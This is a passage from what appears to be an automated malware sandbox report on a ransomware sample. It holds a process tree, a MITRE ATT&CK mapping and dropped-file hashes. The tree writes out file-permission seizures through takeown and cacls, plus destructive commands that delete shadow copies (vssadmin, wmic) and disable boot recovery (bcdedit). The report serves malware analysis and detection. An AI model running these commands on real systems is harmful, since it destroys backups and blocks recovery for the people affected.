    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""
  2⤵
  PID:6184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000L.bin" -nobanner
    3⤵
    PID:5640
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000L.bin" -nobanner
      4⤵
      PID:7884
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""
  2⤵
  PID:7964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"
    3⤵
    - Modifies file permissions
    PID:3464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000V.bin" -nobanner
    3⤵
    PID:7256
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000V.bin" -nobanner
      4⤵
      PID:6788
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""
  2⤵
  PID:6532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C
    3⤵
    PID:7188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"
    3⤵
    - Modifies file permissions
    PID:6600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000006L.bin" -nobanner
    3⤵
    PID:4952
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000006L.bin" -nobanner
      4⤵
      PID:1796
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl""
  2⤵
  PID:7468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl" /E /G Admin:F /C
    3⤵
    PID:6432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl"
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl" -nobanner
    3⤵
    PID:7064
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:7156
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a64eb328-3ac0-4fa6-a525-d0863e5de0d7.1.etl""
  2⤵
  PID:7552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a64eb328-3ac0-4fa6-a525-d0863e5de0d7.1.etl" /E /G Admin:F /C
    3⤵
    PID:6844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a64eb328-3ac0-4fa6-a525-d0863e5de0d7.1.etl"
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.a64eb328-3ac0-4fa6-a525-d0863e5de0d7.1.etl" -nobanner
    3⤵
    PID:2584
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.a64eb328-3ac0-4fa6-a525-d0863e5de0d7.1.etl" -nobanner
      4⤵
      PID:7112
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl""
  2⤵
  PID:3404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl" /E /G Admin:F /C
    3⤵
    PID:6540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl"
    3⤵
    PID:7016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl" -nobanner
    3⤵
    PID:1448
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "NotificationUxBroker.e43d970d-bb6b-4fb6-a53e-400d9698b1d4.1.etl" -nobanner
      4⤵
      PID:7316
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""
  2⤵
  PID:6968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C
    3⤵
    PID:7532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"
    3⤵
    - Modifies file permissions
    PID:7272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007T.bin" -nobanner
    3⤵
    PID:6852
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007T.bin" -nobanner
      4⤵
      PID:5876
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""
  2⤵
  PID:6588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"
    3⤵
    PID:6436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000087.bin" -nobanner
    3⤵
    PID:6744
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000087.bin" -nobanner
      4⤵
      PID:5760
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""
  2⤵
  PID:6420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"
    3⤵
    - Modifies file permissions
    PID:7432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000099.bin" -nobanner
    3⤵
    PID:5944
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000099.bin" -nobanner
      4⤵
      PID:8004
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""
  2⤵
  PID:3564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C
    3⤵
    PID:6772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"
    3⤵
    PID:7716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000009J.bin" -nobanner
    3⤵
    PID:3284
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000009J.bin" -nobanner
      4⤵
      PID:6180
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""
  2⤵
  PID:304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C
    3⤵
    PID:7484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"
    3⤵
    - Modifies file permissions
    PID:5068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000A4.bin" -nobanner
    3⤵
    PID:6036
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000A4.bin" -nobanner
      4⤵
      PID:7812
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""
  2⤵
  PID:6780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C
    3⤵
    PID:7260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000AF.bin" -nobanner
    3⤵
    PID:8100
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000AF.bin" -nobanner
      4⤵
      PID:4672
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""
  2⤵
  PID:3296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"
    3⤵
    - Modifies file permissions
    PID:7116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000AP.bin" -nobanner
    3⤵
    PID:6012
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000AP.bin" -nobanner
      4⤵
      PID:5292
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""
  2⤵
  PID:3480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin"
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000B5.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5204
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000B5.bin" -nobanner
      4⤵
      PID:5432
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl""
  2⤵
  PID:6880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl" /E /G Admin:F /C
    3⤵
    PID:7684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl"
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl" -nobanner
    3⤵
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl" -nobanner
      4⤵
      PID:6896
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl""
  2⤵
  PID:3568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl" /E /G Admin:F /C
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl" -nobanner
    3⤵
    PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl" -nobanner
      4⤵
      PID:6312
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C
    3⤵
    PID:7816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"
    3⤵
    PID:5904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000G.bin" -nobanner
    3⤵
    PID:7972
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000G.bin" -nobanner
      4⤵
      PID:5780
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"
    3⤵
    PID:3784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000R.bin" -nobanner
    3⤵
    PID:6224
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000R.bin" -nobanner
      4⤵
      PID:1652
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000015.bin" -nobanner
    3⤵
    PID:7136
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000015.bin" -nobanner
      4⤵
      PID:4388
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:5048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:3696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:2652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "overlay.png" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5544
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:6056
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.82959552-c42e-4665-aa70-97a25d968e65.1.etl""
  2⤵
  PID:3124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.82959552-c42e-4665-aa70-97a25d968e65.1.etl" /E /G Admin:F /C
    3⤵
    PID:4508

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\xhHdHGze.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3776
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:3240
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6020
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5648
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5972
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:6104

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Extensions\#README_EMAN#.rtf

Filesize
8KB

MD5
7465a1f7680f1d51b1d263fc39e1d666

SHA1
b372fef06fe30dd9e81415b19e86156893ed2ebf

SHA256
fcc02419677c383ee83da0e69ede612d44b50b2ba67465b1c065c58716cb9324

SHA512
8d8b370cd367e43c656597f4e77bce8b7b862eae2a6e056cdb6dc6adf5a40f5545fdfbe7cd315a0f018be055f178831ecaa25dc7ea13b68fd663d0df7b62717d

Download Submit
C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat

Filesize
226B

MD5
4b6ac84b12624cea4cc8dce37d1386d5

SHA1
28d17f6d8018c46ff903320f94c23046bc1e2928

SHA256
a3d74893d9cdab7c6cc7411c2b1b6b3ceaf27709509b5a4e8ccb717d508beb1f

SHA512
17345016770934339c061d2ba521703e14568491794284a41e4ec63fd6b33ff7fb9d99e3baf0d1efd0f725ed419410329f581371256257c4390b158e6e1e839b

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWqlAD4G.exe

Filesize
1.2MB

MD5
a93bd199d34d21cc9102600c6ce782cf

SHA1
31b50d84aa1af4f0e76a523382caba476f6e45dc

SHA256
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

SHA512
642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\bad_27024E430F6CED0A.txt

Filesize
5KB

MD5
